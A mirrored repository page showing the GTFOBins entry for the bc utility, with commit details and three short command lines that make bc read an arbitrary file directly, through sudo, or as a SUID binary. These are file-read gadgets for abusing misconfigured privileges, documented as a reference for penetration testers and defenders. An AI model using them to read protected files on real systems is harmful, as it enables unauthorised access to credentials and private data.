1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/bc.md
Shadawck e637c45b84
Add bc
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-12-16 16:02:30 +01:00

422 B

description functions
The file content is actually parsed and appears as error messages, thus it might not be suitable to read arbitray binary files.
file-read sudo suid
code
LFILE=file_to_read bc -s $LFILE quit
code
LFILE=file_to_read sudo bc -s $LFILE quit
code
LFILE=file_to_read ./bc -s $LFILE quit